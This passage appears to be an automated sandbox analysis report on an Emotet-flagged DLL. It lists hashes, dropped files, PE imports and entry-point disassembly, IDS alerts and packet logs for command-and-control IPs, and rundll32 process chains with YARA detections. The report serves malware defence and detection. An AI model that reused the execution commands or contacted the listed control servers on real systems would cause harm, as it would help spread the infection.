SSDEEP:	384:LHw+W0StseCJ48EApW0StseCJ48E2rTSjlK/ebmLerYSRSY1J2:LHvSB2nSB2RSjlK/+mLesOj1J2
MD5:	49831ECF881C12C2A0CBBBAF37757579
SHA1:	B38176FB9D44357202AE76E07D477B2D1A826406
SHA-256:	66E3B47AFA9A97C62751E7D138DEE5C805E656B141B5505D75F656DA1B3622FB
SHA-512:	763E13BEEEEE7779F3A33B964970746357EDEE69F78C1F8EECAC871966F5F5861E2213471934DC8EE9822F228B1A6D462AB00F3EA71AAE6068B57B013D6B686C
Malicious:	false
Preview:	9.T.... ................e.f.3...w........................)..........y7.8....y..h.(..........y7...)..............3...w...........................................................................................................B...........@...................................................................................................... ...................................................................................................................................................................................................................................................w..x.....y7.................x=.......y7.........................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.07671611637138794
Encrypted:	false
SSDEEP:	3:H0llJ7vdP/TATU/l+cSro+nT7vr/Q/lAll3Vkttlmlnl:8lJr1/kQ/l+vrjvvr/Q/lA3
MD5:	5001E5FBA68E0B3BA9412FFF613B0E2A
SHA1:	82B5D59196DEF5755766A08532BBA0C5C579EB82
SHA-256:	936D0AF59C202C5FEE04072440B354BE35F981344EDB86A62551996F86818173
SHA-512:	BBD61B390158A07484263FE90DC44BD3A693C4103741816DAA4C7DF8C2347F8F2F62E1B5C655F00B020E50BDAD6E7F6585F7F9F8E772F22578FEA5DDE2DF5E35
Malicious:	false
Preview:	........................................3...w..8....y.......y7..............y7......y7.M/.......y.w................x=.......y7.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	Microsoft Cabinet archive data, 61414 bytes, 1 file
Category:	dropped
Size (bytes):	61414
Entropy (8bit):	7.995245868798237
Encrypted:	true
SSDEEP:	1536:EysgU6qmzixT64jYMZ8HbVPGfVDwm/xLZ9rP:wF6qmeo4eH1m9wmLvrP
MD5:	ACAEDA60C79C6BCAC925EEB3653F45E0
SHA1:	2AAAE490BCDACCC6172240FF1697753B37AC5578
SHA-256:	6B0CECCF0103AFD89844761417C1D23ACC41F8AEBF3B7230765209B61EEE5658
SHA-512:	FEAA6E7ED7DDA1583739B3E531AB5C562A222EE6ECD042690AE7DCFF966717C6E968469A7797265A11F6E899479AE0F3031E8CF5BEBE1492D5205E9C59690900
Malicious:	false
Preview:	MSCF............,...................I.......;w........RSNj .authroot.stl..>.(.5..CK..8T....c_.d...A.K...+.d.H..i.RJJ.IQIR..$t)Kd.-[..T\{..ne......<.w......A..B........c...wi......D....c.0D,L........fy....Rg...=........i,3.3..Z....~^ve<...TF....f.zy.,...m.@.0.0...m.3..I(..+..v#...(.2....e...L..y..V.......~U...."<ke.....l.X:Dt..R<7.5\A7L0=..T.V...IDr..8<....r&...I-.^..b.b.".Af....E.._..r.>.`;,.Hob..S.....7'..\.R$.".g..+..64..@nP.....k3...B.`.G..@D.....L.....`^...#OpW.....!....`.....rf:.}.R.@....gR.#7....l..H.#...d.Qh..3..fCX....==#..M.l..~&....[.J9.\..Ww.....Tx.%....]..a4E...q.+...#.a..x..O..V.t..Y1!.T..`U...-...< _@...\|(.....0..3.`.LU...E0.Gu.4KN....5...?.....I.p..'..........N<.d.O..dH@c1t...[w/...T....cYK.X>.0..Z.....O>..9.3.#9X.%.b...5.YK.E.V.....`./.3.._..nN]..=..M.o.F.._..z....._...gY..!Z..?l....vp.l.:.d.Z..W.....~...N.._.k...&.....$......i.F.d.....D!e.....Y..,.E..m.;.1... $.F..O.F.o_}.uG....,.%.>,.Zx.......o....c../.;....g&.....

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	data
Category:	modified
Size (bytes):	328
Entropy (8bit):	3.118359240275542
Encrypted:	false
SSDEEP:	6:kKEbk8SN+SkQlPlEGYRMY9z+4KlDA3RUeYlUmlUR/t:e9kPlE99SNxAhUeYlUSA/t
MD5:	948FEC524891E8542BDCD79348C57004
SHA1:	F8A6A4A87BB771D894637D8E170B42F8F701207D
SHA-256:	03DEE917D4DF098D8A8293E657707C61A2BE0F8BB72E2F47F8A16DE7EE525FEE
SHA-512:	F57CACBBAB26285FD9F6FE87521D33BD61C60A2DA315E4B9B9FC9400AE73C291E4764391071658324CF3CFB55F86CE9A95C43290BC68A8C1F48CDBDC84AF2220
Malicious:	false
Preview:	p...... ...........{...(....................................................... ........q.\].......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.7.1.e.1.5.c.5.d.c.4.d.7.1.:.0."...

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.0681109275193075
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 95.51% InstallShield setup (43055/19) 4.10% Generic Win/DOS Executable (2004/3) 0.19% DOS Executable Generic (2002/1) 0.19% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	NjTYb3VyzV.dll
File size:	397312
MD5:	944f5dec057269043eeb02d551e1593f
SHA1:	c6dc40330793e23a88753d1a5ba18142a0eb33b9
SHA256:	651b117d5a6c37b255cbfa465740b4ea3cea29d41175338c83b1d5b416c29a01
SHA512:	62e2ddd5ba261b56f2149d06a522d28ed2cc81ef9799ce4e731b2bc2b502abed131752619334e3fdf1a383755b41a8f3a0413699c8babe38a41f79951c567f85
SSDEEP:	6144:SwgKH5nGQwn6I6EstfaY0bOjWNUs0G1G9zEoVuIdmF3AxeR9s58SYC:FlFQstfaYAuhPJVTdmF3Axqs58fC
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........\..a...a...a..w....a..w....a...`...a.......a.....f.a.....u.a.......a.......a.......a.......a.Rich..a.........PE..L...n..a...

File Icon


Icon Hash:	5f35298f8ec6c60a

Static PE Info

General
Entrypoint:	0x100134e1
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:
Time Stamp:	0x619FB96E [Thu Nov 25 16:27:26 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	98314c63889d16d0b03b55430157c680

Entrypoint Preview

Instruction
mov edi, edi
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 01h
jne 00007FBC30A5B927h
call 00007FBC30A644E4h
push dword ptr [ebp+08h]
mov ecx, dword ptr [ebp+10h]
mov edx, dword ptr [ebp+0Ch]
call 00007FBC30A5B811h
pop ecx
pop ebp
retn 000Ch
push 0000000Ch
push 1002E358h
call 00007FBC30A5BF3Dh
mov esi, dword ptr [ebp+08h]
test esi, esi
je 00007FBC30A5B997h
cmp dword ptr [1005A4A0h], 03h
jne 00007FBC30A5B965h
push 00000004h
call 00007FBC30A62CEFh
pop ecx
and dword ptr [ebp-04h], 00000000h
push esi
call 00007FBC30A62D17h
pop ecx
mov dword ptr [ebp-1Ch], eax
test eax, eax
je 00007FBC30A5B92Bh
push esi
push eax
call 00007FBC30A62D38h
pop ecx
pop ecx
mov dword ptr [ebp-04h], FFFFFFFEh
call 00007FBC30A5B930h
cmp dword ptr [ebp-1Ch], 00000000h
jne 00007FBC30A5B959h
push dword ptr [ebp+08h]
jmp 00007FBC30A5B92Ch
push 00000004h
call 00007FBC30A62BDBh
pop ecx
ret
push esi
push 00000000h
push dword ptr [10058CC4h]
call dword ptr [10027094h]
test eax, eax
jne 00007FBC30A5B938h
call 00007FBC30A5E568h
mov esi, eax
call dword ptr [10027238h]
push eax
call 00007FBC30A5E518h
mov dword ptr [esi], eax
pop ecx
call 00007FBC30A5BF01h
ret
mov edi, edi
push ebp
mov ebp, esp
push ecx
push ebx
mov eax, dword ptr [ebp+0Ch]
add eax, 0Ch
mov dword ptr [ebp-04h], eax
mov ebx, dword ptr fs:[00000000h]

Rich Headers

Programming Language:

[ C ] VS2008 build 21022
[LNK] VS2008 build 21022
[ C ] VS2005 build 50727
[ASM] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[EXP] VS2008 build 21022
[C++] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x30510	0x4d	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2ed38	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x5b000	0x4a64	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x60000	0x2b80	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x2ba08	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x27000	0x45c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x2ecb0	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x254c7	0x25600	False	0.566602215719	data	6.62724447142	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x27000	0x955d	0x9600	False	0.338177083333	data	5.1473203532	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x31000	0x294d4	0x25a00	False	0.963740656146	data	7.93678251431	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x5b000	0x4a64	0x4c00	False	0.265676398026	data	3.91792897845	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x60000	0x795e	0x7a00	False	0.252337346311	data	3.19645976527	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_CURSOR	0x5bc40	0x134	data	English	United States
RT_CURSOR	0x5bd74	0xb4	data	English	United States
RT_CURSOR	0x5be28	0x134	AmigaOS bitmap font	English	United States
RT_CURSOR	0x5bf5c	0x134	data	English	United States
RT_CURSOR	0x5c090	0x134	data	English	United States
RT_CURSOR	0x5c1c4	0x134	data	English	United States
RT_CURSOR	0x5c2f8	0x134	data	English	United States
RT_CURSOR	0x5c42c	0x134	data	English	United States
RT_CURSOR	0x5c560	0x134	data	English	United States
RT_CURSOR	0x5c694	0x134	data	English	United States
RT_CURSOR	0x5c7c8	0x134	data	English	United States
RT_CURSOR	0x5c8fc	0x134	data	English	United States
RT_CURSOR	0x5ca30	0x134	AmigaOS bitmap font	English	United States
RT_CURSOR	0x5cb64	0x134	data	English	United States
RT_CURSOR	0x5cc98	0x134	data	English	United States
RT_CURSOR	0x5cdcc	0x134	data	English	United States
RT_BITMAP	0x5cf00	0xe0	GLS_BINARY_LSB_FIRST	English	United States
RT_BITMAP	0x5cfe0	0xe0	GLS_BINARY_LSB_FIRST	English	United States
RT_BITMAP	0x5d0c0	0xe0	GLS_BINARY_LSB_FIRST	English	United States
RT_BITMAP	0x5d1a0	0xb8	data	English	United States
RT_BITMAP	0x5d258	0x144	data	English	United States
RT_ICON	0x5d39c	0x2e8	data	English	United States
RT_ICON	0x5d684	0x128	GLS_BINARY_LSB_FIRST	English	United States
RT_DIALOG	0x5d7ac	0x1d2	data	English	United States
RT_DIALOG	0x5d980	0x14e	data	English	United States
RT_DIALOG	0x5dad0	0xe8	data	English	United States
RT_DIALOG	0x5dbb8	0x34	data	English	United States
RT_STRING	0x5dbec	0x2e2	data	English	United States
RT_STRING	0x5ded0	0x82	data	English	United States
RT_STRING	0x5df54	0x2a	data	English	United States
RT_STRING	0x5df80	0x184	data	English	United States
RT_STRING	0x5e104	0x4e6	data	English	United States
RT_STRING	0x5e5ec	0x264	data	English	United States
RT_STRING	0x5e850	0x2da	data	English	United States
RT_STRING	0x5eb2c	0x8a	data	English	United States
RT_STRING	0x5ebb8	0xac	data	English	United States
RT_STRING	0x5ec64	0xde	data	English	United States
RT_STRING	0x5ed44	0x4a8	data	English	United States
RT_STRING	0x5f1ec	0x228	data	English	United States
RT_STRING	0x5f414	0x2c	data	English	United States
RT_STRING	0x5f440	0x42	data	English	United States
RT_GROUP_CURSOR	0x5f484	0x22	Lotus unknown worksheet or configuration, revision 0x2	English	United States
RT_GROUP_CURSOR	0x5f4a8	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0x5f4bc	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0x5f4d0	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0x5f4e4	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0x5f4f8	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0x5f50c	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0x5f520	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0x5f534	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0x5f548	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0x5f55c	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0x5f570	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0x5f584	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0x5f598	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0x5f5ac	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_ICON	0x5f5c0	0x22	data	English	United States
RT_VERSION	0x5f5e4	0x2e4	data	English	United States
RT_MANIFEST	0x5f8c8	0x15a	ASCII text, with CRLF line terminators	English	United States
None	0x5fa24	0x3d	data	English	United States

Imports

DLL	Import
KERNEL32.dll	HeapAlloc, GetCommandLineA, HeapFree, RtlUnwind, HeapReAlloc, RaiseException, VirtualAlloc, Sleep, HeapSize, SetStdHandle, GetFileType, TerminateProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetACP, IsValidCodePage, VirtualFree, HeapCreate, HeapDestroy, GetStdHandle, SetHandleCount, GetStartupInfoA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, GetSystemTimeAsFileTime, GetTimeZoneInformation, GetDriveTypeA, InitializeCriticalSectionAndSpinCount, GetConsoleCP, GetConsoleMode, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CompareStringW, SetEnvironmentVariableA, GetCurrentDirectoryA, WritePrivateProfileStringA, GetOEMCP, GetCPInfo, InterlockedIncrement, GetModuleHandleW, GetFullPathNameA, GetCurrentProcess, FlushFileBuffers, SetFilePointer, WriteFile, CreateFileA, TlsFree, LocalReAlloc, TlsSetValue, TlsAlloc, GlobalHandle, GlobalReAlloc, TlsGetValue, GlobalFlags, WaitForSingleObject, CloseHandle, GetCurrentThread, ConvertDefaultLocale, EnumResourceLanguagesA, GetLocaleInfoA, InterlockedExchange, lstrcmpA, FreeResource, GetCurrentThreadId, GlobalGetAtomNameA, GlobalAddAtomA, GlobalFindAtomA, GlobalDeleteAtom, CompareStringA, lstrcmpW, GetVersionExA, GlobalFree, GlobalAlloc, GlobalLock, GlobalUnlock, MulDiv, InterlockedDecrement, FormatMessageA, LocalFree, LocalAlloc, FreeLibrary, LeaveCriticalSection, EnterCriticalSection, DeleteCriticalSection, InitializeCriticalSection, GetCurrentProcessId, GetModuleFileNameA, MultiByteToWideChar, FindFirstFileA, FileTimeToLocalFileTime, FileTimeToSystemTime, FindNextFileA, FindClose, lstrlenA, GetModuleHandleA, LoadLibraryA, GetProcAddress, SetLastError, GetLastError, ExitProcess, LockResource, SizeofResource, WideCharToMultiByte, LoadResource, FreeEnvironmentStringsA, FindResourceA
USER32.dll	LoadCursorA, GetSysColorBrush, GetMessageA, TranslateMessage, GetCursorPos, ValidateRect, SetCursor, PostQuitMessage, DestroyMenu, GetActiveWindow, CreateDialogIndirectParamA, GetNextDlgTabItem, EndDialog, EndPaint, BeginPaint, ClientToScreen, GrayStringA, DrawTextExA, DrawTextA, TabbedTextOutA, ShowWindow, MoveWindow, SetWindowTextA, IsDialogMessageA, RegisterWindowMessageA, SendDlgItemMessageA, WinHelpA, GetCapture, SetWindowsHookExA, GetClassLongA, GetClassNameA, SetPropA, GetPropA, RemovePropA, SetFocus, GetWindowTextLengthA, GetWindowTextA, GetForegroundWindow, SetActiveWindow, DispatchMessageA, GetTopWindow, DestroyWindow, GetMessageTime, GetMessagePos, PeekMessageA, MapWindowPoints, GetKeyState, SetMenu, SetForegroundWindow, IsWindowVisible, UpdateWindow, PostMessageA, CreateWindowExA, GetClassInfoExA, GetClassInfoA, RegisterClassA, GetSysColor, AdjustWindowRectEx, ScreenToClient, PtInRect, GetDlgCtrlID, DefWindowProcA, CallWindowProcA, GetMenu, SetWindowLongA, SetWindowPos, SystemParametersInfoA, GetWindowPlacement, GetWindow, GetMenuItemID, CallNextHookEx, GetMenuItemCount, GetSubMenu, UnhookWindowsHookEx, GetDesktopWindow, GetWindowThreadProcessId, GetWindowLongA, GetLastActivePopup, IsWindowEnabled, SetMenuItemBitmaps, GetMenuCheckMarkDimensions, GetFocus, GetParent, ModifyMenuA, GetMenuState, EnableMenuItem, CheckMenuItem, ReleaseDC, GetDC, CopyRect, IsWindow, GetSystemMenu, GetWindowRect, IsIconic, LoadBitmapA, LoadIconA, DrawIcon, GetClientRect, MessageBoxA, AppendMenuA, GetSystemMetrics, SendMessageA, EnableWindow, GetDlgItem
GDI32.dll	DeleteDC, GetStockObject, SetWindowExtEx, ScaleWindowExtEx, ScaleViewportExtEx, SetViewportExtEx, OffsetViewportOrgEx, SetViewportOrgEx, SelectObject, Escape, ExtTextOutA, TextOutA, RectVisible, DeleteObject, SetMapMode, RestoreDC, SaveDC, GetObjectA, SetBkColor, SetTextColor, GetClipBox, GetDeviceCaps, CreateBitmap, PtVisible
WINSPOOL.DRV	DocumentPropertiesA, OpenPrinterA, ClosePrinter
ADVAPI32.dll	RegSetValueExA, RegCreateKeyExA, RegQueryValueA, RegOpenKeyA, RegEnumKeyA, RegDeleteKeyA, RegOpenKeyExA, RegQueryValueExA, RegCloseKey
SHLWAPI.dll	UrlUnescapeA, PathFindExtensionA
OLEAUT32.dll	VariantClear, VariantChangeType, VariantInit
WININET.dll	InternetConnectA, FtpFindFirstFileA, InternetSetStatusCallback, InternetOpenA, InternetGetLastResponseInfoA, InternetCloseHandle, InternetFindNextFileA, InternetCrackUrlA, InternetCanonicalizeUrlA, FtpSetCurrentDirectoryA, FtpGetCurrentDirectoryA

Exports

Name	Ordinal	Address
Control_RunDLL	1	0x1000325e

Version Infos

Description	Data
LegalCopyright	Microsoft Corporation. All rights reserved.
InternalName	FTPTREE
FileVersion	1, 0, 0, 1
ProductName	FTPTREE Application
ProductVersion	1, 0, 0, 1
FileDescription	FTPTREE MFC Application
OriginalFilename	FTPTREE.EXE
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
11/25/21-20:11:47.796639	TCP	2404346	ET CNC Feodo Tracker Reported CnC Server TCP group 24	49762	443	192.168.2.6	91.200.186.228
11/25/21-20:12:20.540766	TCP	2021013	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC)	8080	49765	41.76.108.46	192.168.2.6

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 25, 2021 20:11:47.796638966 CET	49762	443	192.168.2.6	91.200.186.228
Nov 25, 2021 20:11:47.796709061 CET	443	49762	91.200.186.228	192.168.2.6
Nov 25, 2021 20:11:47.796791077 CET	49762	443	192.168.2.6	91.200.186.228
Nov 25, 2021 20:11:47.815093040 CET	49762	443	192.168.2.6	91.200.186.228
Nov 25, 2021 20:11:47.815118074 CET	443	49762	91.200.186.228	192.168.2.6
Nov 25, 2021 20:12:20.084088087 CET	49762	443	192.168.2.6	91.200.186.228
Nov 25, 2021 20:12:20.127723932 CET	49765	8080	192.168.2.6	41.76.108.46
Nov 25, 2021 20:12:20.327598095 CET	8080	49765	41.76.108.46	192.168.2.6
Nov 25, 2021 20:12:20.327780962 CET	49765	8080	192.168.2.6	41.76.108.46
Nov 25, 2021 20:12:20.328546047 CET	49765	8080	192.168.2.6	41.76.108.46
Nov 25, 2021 20:12:20.537070990 CET	8080	49765	41.76.108.46	192.168.2.6
Nov 25, 2021 20:12:20.540766001 CET	8080	49765	41.76.108.46	192.168.2.6
Nov 25, 2021 20:12:20.540791988 CET	8080	49765	41.76.108.46	192.168.2.6
Nov 25, 2021 20:12:20.540869951 CET	49765	8080	192.168.2.6	41.76.108.46
Nov 25, 2021 20:12:20.540930033 CET	49765	8080	192.168.2.6	41.76.108.46
Nov 25, 2021 20:12:22.454547882 CET	49765	8080	192.168.2.6	41.76.108.46
Nov 25, 2021 20:12:22.655797958 CET	8080	49765	41.76.108.46	192.168.2.6
Nov 25, 2021 20:12:22.655930042 CET	49765	8080	192.168.2.6	41.76.108.46
Nov 25, 2021 20:12:22.660901070 CET	49765	8080	192.168.2.6	41.76.108.46
Nov 25, 2021 20:12:22.901134968 CET	8080	49765	41.76.108.46	192.168.2.6
Nov 25, 2021 20:12:24.015575886 CET	8080	49765	41.76.108.46	192.168.2.6
Nov 25, 2021 20:12:24.015729904 CET	49765	8080	192.168.2.6	41.76.108.46
Nov 25, 2021 20:12:27.015990019 CET	8080	49765	41.76.108.46	192.168.2.6
Nov 25, 2021 20:12:27.016007900 CET	8080	49765	41.76.108.46	192.168.2.6
Nov 25, 2021 20:12:27.016063929 CET	49765	8080	192.168.2.6	41.76.108.46
Nov 25, 2021 20:12:27.016103983 CET	49765	8080	192.168.2.6	41.76.108.46
Nov 25, 2021 20:13:37.729064941 CET	49765	8080	192.168.2.6	41.76.108.46
Nov 25, 2021 20:13:37.729108095 CET	49765	8080	192.168.2.6	41.76.108.46

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 3012 Parent PID: 6064

General

Start time:	20:11:35
Start date:	25/11/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe "C:\Users\user\Desktop\NjTYb3VyzV.dll"
Imagebase:	0x8d0000
File size:	893440 bytes
MD5 hash:	72FCD8FB0ADC38ED9050569AD673650E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 1536 Parent PID: 3012

General

Start time:	20:11:35
Start date:	25/11/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\NjTYb3VyzV.dll",#1
Imagebase:	0x2a0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 5116 Parent PID: 3012

General

Start time:	20:11:36
Start date:	25/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\NjTYb3VyzV.dll,Control_RunDLL
Imagebase:	0x980000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.349560826.0000000004B40000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.349903901.0000000004CF0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.349400359.00000000046F0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.350183619.0000000004ED0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.350335367.0000000005130000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.350044975.0000000004E70000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 4624 Parent PID: 1536

General

Start time:	20:11:36
Start date:	25/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\NjTYb3VyzV.dll",#1
Imagebase:	0x980000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.348479056.00000000045F0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 4692 Parent PID: 4624

General

Start time:	20:11:37
Start date:	25/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\NjTYb3VyzV.dll",Control_RunDLL
Imagebase:	0x980000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6648 Parent PID: 5116

General

Start time:	20:11:37
Start date:	25/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Xzrjbnqqcb\ruunnfqf.mlu",ZUcsEM
Imagebase:	0x980000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.351790067.0000000004030000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 1972 Parent PID: 6648

General

Start time:	20:11:38
Start date:	25/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Xzrjbnqqcb\ruunnfqf.mlu",Control_RunDLL
Imagebase:	0x980000
File size:	61952 bytes
